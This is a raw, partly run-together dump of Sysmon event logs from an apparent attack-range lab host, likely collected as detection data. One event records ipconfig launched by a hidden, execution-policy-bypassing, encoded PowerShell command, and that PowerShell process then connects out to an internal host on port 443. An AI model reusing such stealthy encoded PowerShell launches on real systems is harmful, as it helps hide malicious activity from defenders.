ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64)
EventID=1 RecordID=36497992 UtcTime=2021-09-14 13:20:20.882 ; ProcessGuid={B81B27B7-A194-6140-9656-04000000C801} ; ProcessId=5924 ; Image=C:\Windows\System32\ipconfig.exe ; FileVersion=10.0.14393.0 (rs1_release.160715-1616) ; Description=IP Configuration Utility ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=ipconfig.exe ; CommandLine="C:\Windows\system32\ipconfig.exe" ; CurrentDirectory=C:\Users\reed_schmidt\ ; User=ATTACKRANGE\REED_SCHMIDT ; LogonGuid={B81B27B7-4132-611D-4F05-090000000000} ; LogonId=0x9054f ; TerminalSessionId=2 ; IntegrityLevel=Medium ; Hashes=MD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A ; ParentProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ; ParentProcessId=6940 ; ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; ParentCommandLine=powershell -exec bypass -Noninteractive -windowstyle hidden -e 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
EventID=23 RecordID=36497991 UtcTime=2021-09-14 13:20:20.113 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=B6BF47C839C0B1D7448A3CD202C72AC5,SHA256=0799AA00D73A5F59FEA4A77446BE09D05839E2CEDE9A5BD28BA1F970E9B1856B,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36498004 UtcTime=2021-09-14 13:20:21.912 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; Hashes=MD5=28A17D44E2D7DFEB085D96DF0E95D9B6,SHA256=A4ECE226B12571329C0EFA87082A5055465C7A0BA3E268EA8067A37D9D66A8FC,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36498003 UtcTime=2021-09-14 13:20:21.912 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; Hashes=MD5=3357F53858A2A3F9698DCFD110EAA3C0,SHA256=D8FD2C1DF0E380A0B5744B7E4B594451D659B9DEF2D610E73638DBDAE0FDF5BA,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36498002 UtcTime=2021-09-14 13:20:21.163 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=203B69F7BE8CF9755FC458EA838E5066,SHA256=1D9D79FA784F9F387228BB8ED0BFF01965531A096DDC670732603BF46D59932F,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36498007 UtcTime=2021-09-14 13:20:22.164 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=77CA612DAB6B97B10AE241143C7C6884,SHA256=210D9C71B273540982711866643BB7F88EA292FE364BF7A95331728BBE75A09F,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=3 RecordID=36498006 UtcTime=2021-09-14 13:20:52.546 ; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ; ProcessId=6940 ; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; User=ATTACKRANGE\REED_SCHMIDT ; Protocol=tcp ; Initiated=true ; SourceIsIpv6=false ; SourceIp=10.0.1.15 ; SourceHostname=win-host-987.attackrange.local ; SourcePort=50603 ; SourcePortName=- ; DestinationIsIpv6=false ; DestinationIp=10.0.1.16 ; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal ; DestinationPort=443 ; DestinationPortName=https
EventID=23 RecordID=36498005 UtcTime=2021-09-14 13:20:21.996 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational ; Hashes=MD5=AFBB5E05B00A4A68FD3E3930F886B6EF,SHA256=01CC3887566C16017C194107E414A60CEEB457FC0B0D6A4357BF4DF26A4FD3D1,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36498010 UtcTime=2021-09-14 13:20:23.263 ; ProcessGuid={B81B27B7-4012-611D-1100-00000000C801} ; ProcessId=968 ; User=NT AUTHORITY\LOCAL SERVICE ; Image=C:\Windows\System32\svchost.exe ; TargetFilename=C:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat ; Hashes=MD5=CD5861B45494142F6FD210E40BED25F6,SHA256=7E317373D55A5A4A5291C948F5973F82D6FE5867A7462A199537B0D69A41D3E7,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36498009 UtcTime=2021-09-14 13:20:23.179 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=70307485CCD931E888C0E9A8A3BE7FFD,SHA256=E33D805C254B1DBED020F0532C407E14B2C8091A6A508E5C1DC53E14DFCFAECB,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=3 RecordID=36498008 UtcTime=2021-09-14 13:20:52.804 ; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ; ProcessId=6940 ; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; User=ATTACKRANGE\REED_SCHMIDT ; Protocol=tcp ; Initiated=true ; SourceIsIpv6=false ; SourceIp=10.0.1.15 ; SourceHostname=win-host-987.attackrange.local ; SourcePort=50604 ; SourcePortName=- ; DestinationIsIpv6=false ; DestinationIp=10.0.1.16 ; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal ; DestinationPort=443 ; DestinationPortName=https
EventID=10 RecordID=36498028 UtcTime=2021-09-14 13:20:24.778 ; SourceProcessGUID={B81B27B7-4014-611D-3000-00000000C801} ; Source ProcessId=3144 ; SourceThreadId=3164 ; SourceImage=C:\Windows\system32\conhost.exe ; TargetProcessGUID={B81B27B7-A198-6140-9856-04000000C801} ; TargetProcessId=3324 ; TargetImage=C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:24.778{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:24.778{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A198-6140-9856-04000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A198-6140-9856-04000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.763{B81B27B7-A198-6140-9856-04000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036498020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.294{B81B27B7-A198-6140-9756-04000000C801}50165404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.194{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30A09996B6A939F613C0A8FF51BA53BC,SHA256=218BAA12149188050530B23EE8EC6E7EFD6E801C072C86CCC1E34FDCC743FF3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A198-6140-9756-04000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:24.094{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:24.094{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A198-6140-9756-04000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A198-6140-9756-04000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.079{B81B27B7-A198-6140-9756-04000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:25.209{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0EA67FA9C1FAA46D534E746ACB133B,SHA256=CB7A14DB33352F43E28B78A21563AC0B499D185CE9E041F5D2BF5CB1CB6E958E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:25.093{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28A17D44E2D7DFEB085D96DF0E95D9B6,SHA256=A4ECE226B12571329C0EFA87082A5055465C7A0BA3E268EA8067A37D9D66A8FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:26.227{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0815A68123E2A339078C6BE426D3D358,SHA256=2687EFE08F285BB89F97D461E99255695D23948597EA2886BB05CA8252E6B497,IMPHASH=00000000000000000000000000000000falsefalse - insufficient 
disk space 23542300x800000000000000036498041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB8F7580E032EF00F91E2A9EBB8268E8,SHA256=27FBA10680194D708F18B8A9ED5FC93107DDBBCBF526B9AD127E1BE8C8AC7C48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:56.714{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50605-false10.0.1.12-8000- 